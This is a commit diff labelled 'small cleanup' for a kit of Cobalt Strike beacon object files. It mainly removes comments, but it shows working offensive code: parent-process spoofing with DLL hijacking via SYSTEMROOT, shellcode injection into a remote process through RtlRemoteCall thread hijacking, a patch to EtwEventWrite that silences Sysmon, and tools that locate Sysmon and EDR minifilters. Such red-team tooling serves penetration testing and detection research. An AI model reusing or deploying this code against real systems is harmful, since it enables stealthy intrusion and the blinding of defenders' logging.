small cleanup

KIT/BlindEventlog/blindeventlog.c

@@ -107,21 +107,6 @@ BOOL SetPrivilege(LPCTSTR lpszPrivilege, BOOL bEnablePrivilege) {
     TOKEN_PRIVILEGES tp;
     LUID luid;
 
-	/*
-	//alternative option if advapi32 isn't getting loaded
-	HMODULE hAdvapi32;
-    hAdvapi32 = KERNEL32$LoadLibraryA("Advapi32.dll");
-    if (hAdvapi32 == NULL) {
-        return FALSE;
-    }
-	
-    OpenProcessToken_t pOpenProcessToken = (OpenProcessToken_t)GetProcAddress(hAdvapi32, "OpenProcessToken");
-    if (pOpenProcessToken == NULL) {
-        return FALSE;
-    }
-    if (!pOpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) return FALSE;
-	*/
-	
 	if (!Advapi32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) return FALSE;
     if (!Advapi32$LookupPrivilegeValueA(NULL, lpszPrivilege, &luid)) return FALSE; 
 

KIT/DllEnvHijacking/dllenvhijacking.c

@@ -88,33 +88,27 @@ BOOL RunProc(WCHAR *sysrootPath, char *targetProcPath, int pid) {
 	HANDLE hParentProcess = NULL;
 	BOOL setEnvSuccess = TRUE;
 	
-	//set env variable to new systemroot
 	if (KERNEL32$SetEnvironmentVariableW(L"SYSTEMROOT", sysrootPath) == 0) {
 		BeaconPrintf(CALLBACK_ERROR, "Failed to set the new environment variable!\n");
 		return FALSE; 
 	}
 	
-	// create fresh attributelist
 	KERNEL32$InitializeProcThreadAttributeList(NULL, 1, 0, &cbAttributeListSize); 
 	pAttributeList = (PPROC_THREAD_ATTRIBUTE_LIST) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, cbAttributeListSize);
 	KERNEL32$InitializeProcThreadAttributeList(pAttributeList, 1, 0, &cbAttributeListSize);
 
-	// copy and spoof parent process ID
 	hParentProcess = KERNEL32$OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
 	KERNEL32$UpdateProcThreadAttribute(pAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hParentProcess, sizeof(HANDLE), NULL, NULL);
 	info.lpAttributeList = pAttributeList;
 	
-	// start new process under spoofed process in suspended state
 	if (KERNEL32$CreateProcessA(NULL, targetProcPath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &info.StartupInfo, &processInfo) == 0) {
 		setEnvSuccess = FALSE;
 	}
 	
-	//reset environment variable for beacon
 	if (KERNEL32$SetEnvironmentVariableW(L"SYSTEMROOT", L"C:\\Windows\\") == 0) {
 		BeaconPrintf(CALLBACK_ERROR, "Failed to reset the old environment variable!\n");
 	}
 
-	//clean up
 	KERNEL32$DeleteProcThreadAttributeList(pAttributeList);
 	KERNEL32$CloseHandle(hParentProcess);
 	KERNEL32$CloseHandle(processInfo.hProcess);
@@ -131,11 +125,11 @@ int go(char *args, int len) {
 	WCHAR dllDstPath[100]; 
 	WCHAR dllSrcPath[100]; 
 	char targetProcPath[100];
-	WCHAR *sysrootPath; //L"C:\\Data\\";
-	WCHAR *proxyDll; //L"mswsock.dll"
-	WCHAR *inputDllSrcPath; //L"C:\\Users\\Public\\Documents\\"
-	char *targetProc; //"hostname.exe"
-	int *pid; //5456
+	WCHAR *sysrootPath; 
+	WCHAR *proxyDll; 
+	WCHAR *inputDllSrcPath; 
+	char *targetProc; 
+	int *pid; 
 	BOOL res = FALSE;
 	datap parser;
 	

KIT/FindDotnet/finddotnet.c

@@ -25,8 +25,7 @@ HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 		}
 	}
 
-	// For BOF we need to avoid large stack buffers, so put print buffer on heap.
-	if (g_lpwPrintBuffer <= (LPWSTR)1) { // Allocate once and free in BeaconOutputStreamW. 
+	if (g_lpwPrintBuffer <= (LPWSTR)1) { 
 		g_lpwPrintBuffer = (LPWSTR)MSVCRT$calloc(MAX_STRING, sizeof(WCHAR));
 		if (g_lpwPrintBuffer == NULL) {
 			hr = E_FAIL;
@@ -93,7 +92,7 @@ CleanUp:
 	}
 
 	if (g_lpwPrintBuffer != NULL) {
-		MSVCRT$free(g_lpwPrintBuffer); // Free print buffer.
+		MSVCRT$free(g_lpwPrintBuffer);
 		g_lpwPrintBuffer = NULL;
 	}
 
@@ -118,7 +117,6 @@ BOOL FindDotNet() {
 	LPCSTR procName;
 	WCHAR WCprocName[256];
 	
-	// resolve function addresses
 	NtGetNextProcess_t pNtGetNextProcess = (NtGetNextProcess_t) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtGetNextProcess");
 	NtOpenSection_t pNtOpenSection = (NtOpenSection_t) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtOpenSection");
 	if (pNtGetNextProcess == NULL || pNtOpenSection == NULL) {
@@ -126,32 +124,25 @@ BOOL FindDotNet() {
 		return -1;		
 	}
 	
-	// Most .NET processes have a handle open to a section named \BaseNamedObjects\Cor_Private_IPCBlock(_v4)_<ProcessId>.
 	WCHAR objPath[] = L"\\BaseNamedObjects\\Cor_Private_IPCBlock_v4_";
 	sectionName.Buffer = (PWSTR)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, 500);
 
-
 	BeaconPrintToStreamW(L"\nProcess name\t\t\t\t\t\tPID\n");
 	BeaconPrintToStreamW(L"=====================================================================\n");
 
-
-	// loop through all processes
 	while (!pNtGetNextProcess(currentProc, MAXIMUM_ALLOWED, 0, 0, &currentProc)) {
 		
 		pid = KERNEL32$GetProcessId(currentProc);
 		if (pid == 0) continue;		
 
-		// convert INT to WCHAR
 		USER32$wsprintfW(ProcNumber, L"%d", pid);
 
-		// and fill out UNICODE_STRING structure
 		MSVCRT$memset(sectionName.Buffer, 0, 500);
 		MSVCRT$memcpy(sectionName.Buffer, objPath, MSVCRT$wcslen(objPath) * 2);   // add section name "prefix"
 		KERNEL32$lstrcatW(sectionName.Buffer, ProcNumber);
 		sectionName.Length = MSVCRT$wcslen(sectionName.Buffer) * 2;		// finally, adjust the string size
 		sectionName.MaximumLength = sectionName.Length + 1;		
 	
-		// try to open the section - if exists, .NET process is found
 		InitializeObjectAttributes(&objectAttributes, &sectionName, OBJ_CASE_INSENSITIVE, NULL, NULL);
 
 		HANDLE sectionHandle = NULL;		
@@ -182,7 +173,6 @@ int go(void) {
 		BeaconPrintf(CALLBACK_ERROR, "No .NET process found!");
 	}
 	else {
-		//print data to CS console
 		BeaconOutputStreamW();
 	}
 	

KIT/FindHandle/findhandle.c

@@ -21,8 +21,7 @@ HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 		}
 	}
 
-	// For BOF we need to avoid large stack buffers, so put print buffer on heap.
-	if (g_lpwPrintBuffer <= (LPWSTR)1) { // Allocate once and free in BeaconOutputStreamW. 
+	if (g_lpwPrintBuffer <= (LPWSTR)1) { 
 		g_lpwPrintBuffer = (LPWSTR)MSVCRT$calloc(MAX_STRING, sizeof(WCHAR));
 		if (g_lpwPrintBuffer == NULL) {
 			hr = E_FAIL;
@@ -89,7 +88,7 @@ CleanUp:
 	}
 
 	if (g_lpwPrintBuffer != NULL) {
-		MSVCRT$free(g_lpwPrintBuffer); // Free print buffer.
+		MSVCRT$free(g_lpwPrintBuffer); 
 		g_lpwPrintBuffer = NULL;
 	}
 
@@ -122,7 +121,6 @@ BOOL GetHandles(int basePid, const BYTE flags, int targetPid) {
     NtDuplicateObject_t pNtDuplicateObject = (NtDuplicateObject_t) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtDuplicateObject");
     NtQueryObject_t pNtQueryObject = (NtQueryObject_t) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryObject");
 
-	// parse which handle types extract
 	WCHAR Filter[100];
 	switch(flags) {
 		case QUERY_PROC:	MSVCRT$swprintf_s(Filter, 50, L"%s", L"Process"); break;
@@ -147,13 +145,10 @@ BOOL GetHandles(int basePid, const BYTE flags, int targetPid) {
         UNICODE_STRING objectName;
         ULONG returnLength;
 		
-		//Skip system processes
 		if(objHandle.UniqueProcessId == 4) continue;
 		
-		//p2h: if the process doens't match the basePid, go to the next
         if ((basePid != 0) && (objHandle.UniqueProcessId != basePid)) continue;
 		
-		//all: for some reason handles dont fully close if the tool is finshed in COFF. This will skip all the handles from the previous enumeration task
 		if (objHandle.UniqueProcessId == KERNEL32$GetCurrentProcessId()) continue;
  
  
@@ -199,7 +194,6 @@ BOOL GetHandles(int basePid, const BYTE flags, int targetPid) {
 			}
 		}
 		
-		//h2p: if the process doens't match the targetPid, go to the next
 		if (targetPid != 0 && targetPid != procID) {
 			MSVCRT$free(objectTypeInfo);
 			MSVCRT$free(objectNameInfo);
@@ -207,7 +201,6 @@ BOOL GetHandles(int basePid, const BYTE flags, int targetPid) {
 			continue;
 		}
 		
-		//if the PID of the handle is 0 or pointing to itself, skip it otherwise print output to stream
 		if(procID != 0 && objHandle.UniqueProcessId != procID) {
 			WCHAR WprocHostName[100];
 			WCHAR WprocNameTemp[100];
@@ -250,9 +243,6 @@ int go(char *args, int len) {
 	search = BeaconDataExtract(&parser, NULL);
 	query = BeaconDataExtract(&parser, NULL);
 
-	//BeaconPrintf(CALLBACK_OUTPUT, "search: %s\n", search); //DEBUG
-	//BeaconPrintf(CALLBACK_OUTPUT, "query: %s\n", query); //DEBUG
-
 	if (MSVCRT$strcmp(query, "proc") == 0) flags = QUERY_PROC;
 	else if (MSVCRT$strcmp(query, "thread") == 0) flags = QUERY_THREAD;
 	else {

KIT/FindLib/findlib.c

@@ -10,7 +10,7 @@
 #pragma comment(lib, "Shlwapi.lib")
 
 
-//Code from: https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
 HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 	HRESULT hr = S_FALSE;
 	va_list argList;
@@ -23,8 +23,7 @@ HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 		}
 	}
 
-	// For BOF we need to avoid large stack buffers, so put print buffer on heap.
-	if (g_lpwPrintBuffer <= (LPWSTR)1) { // Allocate once and free in BeaconOutputStreamW. 
+	if (g_lpwPrintBuffer <= (LPWSTR)1) {
 		g_lpwPrintBuffer = (LPWSTR)MSVCRT$calloc(MAX_STRING, sizeof(WCHAR));
 		if (g_lpwPrintBuffer == NULL) {
 			hr = E_FAIL;
@@ -56,7 +55,7 @@ CleanUp:
 	return hr;
 }
 
-//Code from: https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
 VOID BeaconOutputStreamW() {
 	STATSTG ssStreamData = { 0 };
 	SIZE_T cbSize = 0;
@@ -91,7 +90,7 @@ CleanUp:
 	}
 
 	if (g_lpwPrintBuffer != NULL) {
-		MSVCRT$free(g_lpwPrintBuffer); // Free print buffer.
+		MSVCRT$free(g_lpwPrintBuffer); 
 		g_lpwPrintBuffer = NULL;
 	}
 

KIT/FindRWX/findrwx.c

@@ -6,7 +6,7 @@
 #include "findrwx.h"
 
 
-//Code from: https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
 HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 	HRESULT hr = S_FALSE;
 	va_list argList;
@@ -19,8 +19,7 @@ HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 		}
 	}
 
-	// For BOF we need to avoid large stack buffers, so put print buffer on heap.
-	if (g_lpwPrintBuffer <= (LPWSTR)1) { // Allocate once and free in BeaconOutputStreamW. 
+	if (g_lpwPrintBuffer <= (LPWSTR)1) { 
 		g_lpwPrintBuffer = (LPWSTR)MSVCRT$calloc(MAX_STRING, sizeof(WCHAR));
 		if (g_lpwPrintBuffer == NULL) {
 			hr = E_FAIL;
@@ -52,7 +51,7 @@ CleanUp:
 	return hr;
 }
 
-//Code from: https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
 VOID BeaconOutputStreamW() {
 	STATSTG ssStreamData = { 0 };
 	SIZE_T cbSize = 0;
@@ -87,7 +86,7 @@ CleanUp:
 	}
 
 	if (g_lpwPrintBuffer != NULL) {
-		MSVCRT$free(g_lpwPrintBuffer); // Free print buffer.
+		MSVCRT$free(g_lpwPrintBuffer);
 		g_lpwPrintBuffer = NULL;
 	}
 
@@ -99,7 +98,6 @@ CleanUp:
 }
 
 
-//find RWX memory region in found .NET process
 BOOL FindRWX(HANDLE hProcess) {
 	
 	BOOL foundRWX = FALSE;
@@ -116,11 +114,9 @@ BOOL FindRWX(HANDLE hProcess) {
 	BeaconPrintToStreamW(L"\nMemory address\t\t\tByte size\n");
 	BeaconPrintToStreamW(L"================================================\n");
 	
-	// query remote process memory information
 	while (KERNEL32$VirtualQueryEx(hProcess, addr, &mbi, sizeof(mbi))) {
 		addr = (LPVOID)((DWORD_PTR) mbi.BaseAddress + mbi.RegionSize);
 
-		// look for RWX memory regions which are not backed by an image
 		if (mbi.Protect == PAGE_EXECUTE_READWRITE && mbi.State == MEM_COMMIT && mbi.Type == MEM_PRIVATE) {
 			BeaconPrintToStreamW(L"%#-30llx\t%#7llu\n", mbi.BaseAddress, mbi.RegionSize);
 			foundRWX = TRUE;
@@ -154,7 +150,6 @@ void go(char *args, int len) {
 		BeaconPrintf(CALLBACK_ERROR, "No READ, WRITE, EXECUTE memory region found in the specified process!");
 	}
 	else {
-		//print data to CS console
 		BeaconOutputStreamW();
 		BeaconPrintf(CALLBACK_OUTPUT, "\n[+] DONE");
 	}

KIT/FindSysmon/findsysmon.c

@@ -10,7 +10,7 @@
 
 
 
-//Code from: https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
 HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 	HRESULT hr = S_FALSE;
 	va_list argList;
@@ -55,7 +55,7 @@ CleanUp:
 	return hr;
 }
 
-//Code from: https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
 VOID BeaconOutputStreamW() {
 	STATSTG ssStreamData = { 0 };
 	SIZE_T cbSize = 0;
@@ -100,9 +100,7 @@ CleanUp:
 }
 
 
-
-
-//https://gist.githubusercontent.com/stevemk14ebr/af8053c506ef895cd520f8017a81f913/raw/98944bc6ae995229d5231568a8ae73dd287e8b4f/guids
+//IID: https://gist.githubusercontent.com/stevemk14ebr/af8053c506ef895cd520f8017a81f913/raw/98944bc6ae995229d5231568a8ae73dd287e8b4f/guids
 BOOL PrintSysmonPID(wchar_t * guid) {
 	HRESULT hr = S_OK;
 	ITraceDataProvider *itdProvider = NULL;
@@ -118,13 +116,13 @@ BOOL PrintSysmonPID(wchar_t * guid) {
 	hr = OLE32$CoCreateInstance(&CTraceDataProvider, 0, CLSCTX_INPROC_SERVER, &IIDITraceDataProvider, (LPVOID *) &itdProvider); 
 	if(FAILED(hr))
 	{
-		//BeaconPrintf(CALLBACK_ERROR,"Failed to create instance of object: %lX", hr);
+		BeaconPrintf(CALLBACK_ERROR,"Failed to create instance of object: %lX", hr);
 	}
 	
 	hr = itdProvider->lpVtbl->Query(itdProvider, guid, NULL);
 	if(FAILED(hr))
 	{
-		//BeaconPrintf(CALLBACK_ERROR,"Failed to query the process based on the GUID: %lX\n", hr);
+		BeaconPrintf(CALLBACK_ERROR,"Failed to query the process based on the GUID: %lX\n", hr);
 	}
 	IValueMap *ivmProcesses = NULL;
 	hr = itdProvider->lpVtbl->GetRegisteredProcesses(itdProvider, &ivmProcesses);
@@ -218,12 +216,10 @@ BOOL FindSysmon() {
         status = TDH$TdhEnumerateProviders(penum, &BufferSize);
     }
 	
-	//AANPASSEN
     if (status != ERROR_SUCCESS) 
 		BeaconPrintf(CALLBACK_ERROR,"TdhEnumerateProviders failed.\n");
 	
     else {
-        // search for Sysmon guid
         for (DWORD i = 0; i < penum->NumberOfProviders; i++) {
             hr = OLE32$StringFromGUID2(&penum->TraceProviderInfoArray[i].ProviderGuid, StringGuid, ARRAYSIZE(StringGuid));
             if (FAILED(hr)) return FALSE;
@@ -264,21 +260,18 @@ int PrintMiniFilterData(FILTER_AGGREGATE_STANDARD_INFORMATION * lpFilterInfo) {
 	
 	fltInfo = (FILTER_AGGREGATE_STANDARD_INFORMATION *) lpFilterInfo;
 
-	// convert Filter name
 	int fltName_size = fltInfo->Type.MiniFilter.FilterNameLength;
 	LONGLONG src = ((LONGLONG) lpFilterInfo) + fltInfo->Type.MiniFilter.FilterNameBufferOffset;
 	fltName = (char *) MSVCRT$malloc(fltName_size + 2);
 	MSVCRT$memset(fltName, 0, fltName_size + 2);
 	MSVCRT$memcpy(fltName, (void *) src, fltName_size);
 	
-	// convert Filter altitude
 	int fltAlt_size = fltInfo->Type.MiniFilter.FilterAltitudeLength;
 	src = ((LONGLONG) lpFilterInfo) + fltInfo->Type.MiniFilter.FilterAltitudeBufferOffset;
 	fltAlt = (char *) MSVCRT$malloc(fltAlt_size + 2);
 	MSVCRT$memset(fltAlt, 0, fltAlt_size + 2);
 	MSVCRT$memcpy(fltAlt, (void *) src, fltAlt_size);	
 	
-	// print only data about minifilters
 	if (fltInfo->Flags == FLTFL_ASI_IS_MINIFILTER) {
 		BeaconPrintToStreamW(L"%-29s%s\t%26d\n", fltName, fltAlt, fltInfo->Type.MiniFilter.NumberOfInstances);
 	}
@@ -306,7 +299,6 @@ BOOL FindMiniFilters() {
 	PrintMiniFilterData((FILTER_AGGREGATE_STANDARD_INFORMATION *) lpFilterInfo);
 	foundMinifilter = TRUE;
 
-	
 	while(true) {
 		res = Fltlib$FilterFindNext(hFilterFind, FilterAggregateStandardInformation, lpFilterInfo, dwFilterInfoSize, &dwBytesReturned);
 		if (res == HRESULT_FROM_WIN32(ERROR_NO_MORE_ITEMS)) break;

KIT/LoadLib/loadlib.c

@@ -28,16 +28,13 @@ int FindThreadID(int pid){
 
 
 typedef struct _API_REMOTE_CALL {
-	// remote API call return value
 	size_t		retval;
 	
-	// standard function to call at the end of the shellcode
 	NtContinue_t ntContinue;
 	CONTEXT		context;
 	
-	// remote function to call - adjust the types!
 	LoadLibraryA_t ARK_func;
-	char		param1[100];				// LPCSTR
+	char		param1[100]; // LPCSTR
 	
 } ApiReeKall;
 
@@ -59,7 +56,6 @@ size_t MakeReeKall(HANDLE hProcess, HANDLE hThread, ApiReeKall ark) {
 					};
 	int prolog_size = sizeof(prolog);
 	
-	// resolve needed API pointers
 	RtlRemoteCall_t pRtlRemoteCall = (RtlRemoteCall_t) GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlRemoteCall");
 	NtContinue_t pNtContinue = (NtContinue_t) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtContinue");
 	
@@ -68,45 +64,38 @@ size_t MakeReeKall(HANDLE hProcess, HANDLE hThread, ApiReeKall ark) {
 		return -1;		
 	}
 	
-	// allocate some space in the target for our shellcode
 	void * remote_mem = KERNEL32$VirtualAllocEx(hProcess, 0, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 	if (remote_mem == NULL) {
 		BeaconPrintf(CALLBACK_ERROR, "Error allocating remote memory!\n");
 		return -1;
 	}
 	
-	// calculate the size of our shellcode
 	size_t sc_size = (size_t) SHELLCODE_END - (size_t) SHELLCODE;
 	
 	size_t bOut = 0;
 #ifdef _WIN64 
-	// first, write prolog, if the process is 64-bit
 	if (KERNEL32$WriteProcessMemory(hProcess, remote_mem, prolog, prolog_size, (SIZE_T *) &bOut) == 0) {
 		KERNEL32$VirtualFreeEx(hProcess, remote_mem, 0, MEM_RELEASE);
 		BeaconPrintf(CALLBACK_ERROR, "Error writing remote memory (prolog)!\n");
 		return -1;
 	}
 #else
-	// otherwise, ignore the prolog
 	prolog_size = 0;
 #endif
-	// write the main payload
 	if (KERNEL32$WriteProcessMemory(hProcess, (char *) remote_mem + prolog_size, &SHELLCODE, sc_size, (SIZE_T *) &bOut) == 0) {
 		KERNEL32$VirtualFreeEx(hProcess, remote_mem, 0, MEM_RELEASE);
 		BeaconPrintf(CALLBACK_ERROR, "Error writing remote memory (shellcode)!\n");
 		return -1;
 	}
 	
-	// set remaining data in ApiReeKall struct - NtContinue with a thread context we're hijacking
 	ark.retval = RETVAL_TAG;
 	ark.ntContinue = pNtContinue;
 	ark.context.ContextFlags = CONTEXT_FULL;
 	KERNEL32$SuspendThread(hThread);
 	KERNEL32$GetThreadContext(hThread, &ark.context);
 
-	// prepare an argument to be passed to our shellcode
 	ApiReeKall * ark_arg;
-	ark_arg = (ApiReeKall  *) ((size_t) remote_mem + sc_size + prolog_size + 4);		// align to 0x10
+	ark_arg = (ApiReeKall  *) ((size_t) remote_mem + sc_size + prolog_size + 4);
 	if (KERNEL32$WriteProcessMemory(hProcess, ark_arg, &ark, sizeof(ApiReeKall), 0) == 0) {
 		KERNEL32$VirtualFreeEx(hProcess, remote_mem, 0, MEM_RELEASE);
 		KERNEL32$ResumeThread(hThread);
@@ -114,7 +103,6 @@ size_t MakeReeKall(HANDLE hProcess, HANDLE hThread, ApiReeKall ark) {
 		return -1;		
 	}
 
-	// if all is set, make a remote call
 	NTSTATUS status = pRtlRemoteCall(hProcess, hThread, remote_mem, 1, (PULONG) &ark_arg, 1, 1);
 	if (status != 0) {
 		BeaconPrintf(CALLBACK_ERROR, "Failed RtlRemoteCall with status code: %x\n", status);
@@ -125,7 +113,6 @@ size_t MakeReeKall(HANDLE hProcess, HANDLE hThread, ApiReeKall ark) {
 	BeaconPrintf(CALLBACK_OUTPUT, "[+] Made successful remote RPC call with status code: %x\n[*] Wait for the RPC call to be triggered in the remote process..\n", status);
 	KERNEL32$ResumeThread(hThread);
 	
-	// get the remote API call return value
 	size_t ret = 0;
 	while(TRUE) {
 		KERNEL32$Sleep(1000);
@@ -155,7 +142,6 @@ void go(char *args, int len){
 		return -1;		
 	}
 	
-	// open both process and thread in the remote target
 	HANDLE hProcess = KERNEL32$OpenProcess(PROCESS_ALL_ACCESS, 0, pID);
 	HANDLE hThread = KERNEL32$OpenThread(THREAD_ALL_ACCESS, 0, tID);
 	if (hProcess == NULL || hThread == NULL) {
@@ -164,7 +150,6 @@ void go(char *args, int len){
 	}
 	BeaconPrintf(CALLBACK_OUTPUT, "[+] Got handle to remote process and thread!\n");
 	
-	// prepare a ApiReeKall struct with a function to call
 	ApiReeKall ark = { 0 };
 	ark.ARK_func = (LoadLibraryA_t) GetProcAddress(LoadLibrary("kernel32.dll"), "LoadLibraryA");
 	MSVCRT$strcpy_s(ark.param1, 100, pathToDLL);
@@ -174,7 +159,6 @@ void go(char *args, int len){
 		BeaconPrintf(CALLBACK_OUTPUT, "[+] Received call confirmation. DLL should be loaded!\n", ret);
 	}
 
-	// cleanup
 	KERNEL32$CloseHandle(hThread);
 	KERNEL32$CloseHandle(hProcess);
 

KIT/PSremote/psremote.c

@@ -6,7 +6,7 @@
 
 
 
-//Code from: https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
 HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 	HRESULT hr = S_FALSE;
 	va_list argList;
@@ -19,8 +19,7 @@ HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 		}
 	}
 
-	// For BOF we need to avoid large stack buffers, so put print buffer on heap.
-	if (g_lpwPrintBuffer <= (LPWSTR)1) { // Allocate once and free in BeaconOutputStreamW. 
+	if (g_lpwPrintBuffer <= (LPWSTR)1) {  
 		g_lpwPrintBuffer = (LPWSTR)MSVCRT$calloc(MAX_STRING, sizeof(WCHAR));
 		if (g_lpwPrintBuffer == NULL) {
 			hr = E_FAIL;
@@ -45,14 +44,14 @@ HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
 CleanUp:
 
 	if (g_lpwPrintBuffer != NULL) {
-		MSVCRT$memset(g_lpwPrintBuffer, 0, MAX_STRING * sizeof(WCHAR)); // Clear print buffer.
+		MSVCRT$memset(g_lpwPrintBuffer, 0, MAX_STRING * sizeof(WCHAR)); 
 	}
 
 	va_end(argList);
 	return hr;
 }
 
-//Code from: https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
 VOID BeaconOutputStreamW() {
 	STATSTG ssStreamData = { 0 };
 	SIZE_T cbSize = 0;
@@ -77,7 +76,6 @@ VOID BeaconOutputStreamW() {
 		}
 
 		BeaconPrintf(CALLBACK_OUTPUT, "%ls", lpwOutput);
-		//BeaconPrintf(CALLBACK_OUTPUT, "DONE"); //DEBUG
 	}
 
 CleanUp:
@@ -88,7 +86,7 @@ CleanUp:
 	}
 
 	if (g_lpwPrintBuffer != NULL) {
-		MSVCRT$free(g_lpwPrintBuffer); // Free print buffer.
+		MSVCRT$free(g_lpwPrintBuffer); 
 		g_lpwPrintBuffer = NULL;
 	}
 
@@ -119,9 +117,7 @@ int ListProcesses(HANDLE handleTargetHost) {
 		KERNEL32$MultiByteToWideChar(CP_ACP, 0, procName, -1, WCprocName, 256);
 		BeaconPrintToStreamW(L"%-40s\t%d\t%23d\n",WCprocName ,proc_info[i].ProcessId ,proc_info[i].SessionId);
 	}
-	
 	WTSAPI32$WTSCloseServer(handleTargetHost);
-	
 	return 0;
 }
 
@@ -137,10 +133,8 @@ void go(char *args, int len) {
     hostName = BeaconDataExtract(&parser, &argSize);
 
 	handleTargetHost = WTSAPI32$WTSOpenServerA(hostName);
-	
 	res = ListProcesses(handleTargetHost);
 	
-	//print data to CS console
 	BeaconOutputStreamW();
 
 	return 0;

KIT/SilenceSysmon/silencesysmon.c

@@ -29,16 +29,13 @@ BOOL SetPrivilege(LPCTSTR lpszPrivilege, BOOL bEnablePrivilege) {
 
 
 int SilentSysmon(HANDLE hProc) {
-
 	HANDLE hThread = NULL;
 	unsigned char sEtwEventWrite[] = { 'E','t','w','E','v','e','n','t','W','r','i','t','e', 0x0 };
 	
 	void * pEventWrite = GetProcAddress(GetModuleHandle("ntdll.dll"), (LPCSTR) sEtwEventWrite);
 #ifdef _WIN64
-	// xor rax, rax; ret
 	char patch[] = "\x48\x33\xc0\xc3";
 #else
-	// xor eax, eax; ret 14
 	char patch[] = "\x33\xc0\xc2\x14\x00";
 #endif